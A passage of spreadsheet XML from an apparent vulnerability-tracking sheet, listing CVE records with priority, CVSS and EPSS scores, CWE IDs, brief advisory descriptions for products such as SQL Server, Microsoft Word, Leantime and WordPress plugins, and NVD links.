      <c r="L956"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M956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76059</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76647</t>
        </is>
      </c>
      <c r="C957" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E957" s="5" t="inlineStr"/>
      <c r="F957" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="inlineStr"/>
      <c r="I957" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L957" s="5" t="inlineStr">
        <is>
          <t>Leantime JSON-RPC API through version 3.9.0 contains a missing authorization vulnerability in the JSON-RPC dispatcher in app/Domain/Api/Controllers/Jsonrpc.php. The dispatcher does not enforce authorization before invoking service-layer methods, allowing an authenticated user to call methods or act on resources outside their intended permissions. For example, the editOwn method accepts a user-supplied user ID without verifying that it belongs to the caller, allowing an attacker to modify another user's account and set a new password, resulting in account takeover. This vulnerability is distinct from CVE-2026-59712 and CVE-2026-15509 because the root cause is the lack of centralized authorization enforcement in the JSON-RPC dispatcher rather than the behavior of an individual exposed method.</t>
        </is>
      </c>
      <c r="M957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76647</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76801</t>
        </is>
      </c>
      <c r="C958" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E958" s="5" t="inlineStr"/>
      <c r="F958" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="inlineStr"/>
      <c r="I958" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L958" s="5" t="inlineStr">
        <is>
          <t>The FireBox – WooCommerce Popup Builder, Exit Intent Popup, Email Optin &amp; Cart Abandonment plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.1.10 via the value function. This is due to a trivially bypassable regex blacklist in Executer::allowedToRun() that fails to block WordPress core functions such as wp_insert_user, update_option, and file_put_contents, combined with no sanitization of PHP condition rule values stored via the firebox_meta REST endpoint. This makes it possible for authenticated attackers, with author-level access and above, to execute code on the server. On sites upgraded from a version prior to 3.1.10, the Migrator::preserveCampaignRoleAccess() function automatically grants the edit_fireboxes and publish_fireboxes capabilities to the Author role, lowering the effective entry point to Author-level access.</t>
        </is>
      </c>
      <c r="M958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76801</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77097</t>
        </is>
      </c>
      <c r="C959" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E959" s="5" t="inlineStr"/>
      <c r="F959" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="inlineStr"/>
      <c r="I959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L959" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="M959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77098</t>
        </is>
      </c>
      <c r="C960" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E960" s="5" t="inlineStr"/>
      <c r="F960" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="inlineStr"/>
      <c r="I960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L960" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="M960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="C961" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E961" s="5" t="inlineStr"/>
      <c r="F961" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="inlineStr"/>
      <c r="I961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L961" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="C962" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E962" s="5" t="inlineStr"/>
      <c r="F962" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="inlineStr"/>
      <c r="I962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L962" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="C963" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E963" s="5" t="inlineStr"/>
      <c r="F963" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="inlineStr"/>
      <c r="I963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="C964" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E964" s="5" t="inlineStr"/>
      <c r="F964" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="inlineStr"/>
      <c r="I964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="L964" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="C965" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E965" s="5" t="inlineStr"/>
      <c r="F965" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="inlineStr"/>
      <c r="I965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L965" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="C966" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E966" s="5" t="inlineStr"/>
      <c r="F966" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="inlineStr"/>
      <c r="I966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L966" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="C967" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E967" s="5" t="inlineStr"/>
      <c r="F967" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="inlineStr"/>
      <c r="I967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L967" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="C968" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E968" s="5" t="inlineStr"/>
      <c r="F968" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G968" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H968" s="5" t="inlineStr"/>
      <c r="I968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L968" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77504</t>
        </is>
      </c>
      <c r="C969" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E969" s="5" t="inlineStr"/>
      <c r="F969" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G969" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H969" s="5" t="inlineStr"/>
      <c r="I969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L969" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77826</t>
        </is>
      </c>
      <c r="C970" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E970" s="5" t="inlineStr"/>
      <c r="F970" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="inlineStr"/>
      <c r="I970" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L970" s="5" t="inlineStr">
        <is>
          <t>The RegistrationMagic  WordPress plugin before 6.0.9.9 does not verify which application a Facebook access token was issued to before accepting it as proof of identity, allowing unauthenticated attackers to log in as an existing user whose token they can obtain, or to create and log into a new account even when user registration is disabled.</t>
        </is>
      </c>
      <c r="M970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77826</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77901</t>
        </is>
      </c>
      <c r="C971" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E971" s="5" t="inlineStr"/>
      <c r="F971" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G971" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H971" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L971" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77906</t>
        </is>
      </c>
      <c r="C972" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E972" s="5" t="inlineStr"/>
      <c r="F972" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="inlineStr"/>
      <c r="I972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L972" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77907</t>
        </is>
      </c>
      <c r="C973" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E973" s="5" t="inlineStr"/>
      <c r="F973" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G973" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H973" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="I973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L973" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77908</t>
        </is>
      </c>
      <c r="C974" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E974" s="5" t="inlineStr"/>
      <c r="F974" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G974" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H974" s="5" t="inlineStr"/>
      <c r="I974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L974" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78439</t>
        </is>
      </c>
      <c r="C975" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E975" s="5" t="inlineStr"/>
      <c r="F975" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G975" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H975" s="5" t="inlineStr"/>
      <c r="I975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L975" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78442</t>
        </is>
      </c>
      <c r="C976" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E976" s="5" t="inlineStr"/>
      <c r="F976" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G976" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H976" s="5" t="inlineStr"/>
      <c r="I976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L976" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="C977" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E977" s="5" t="inlineStr"/>
      <c r="F977" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="inlineStr"/>
      <c r="I977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L977" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78462</t>
        </is>
      </c>
      <c r="C978" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E978" s="5" t="inlineStr"/>
      <c r="F978" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="inlineStr"/>
      <c r="I978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L978" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78463</t>
        </is>
      </c>
      <c r="C979" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E979" s="5" t="inlineStr"/>
      <c r="F979" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="inlineStr"/>
      <c r="I979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L979" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78504</t>
        </is>
      </c>
      <c r="C980" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E980" s="5" t="inlineStr"/>
      <c r="F980" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G980" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H980" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L980" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M980" s="6" t="inlineStr">
        <is>
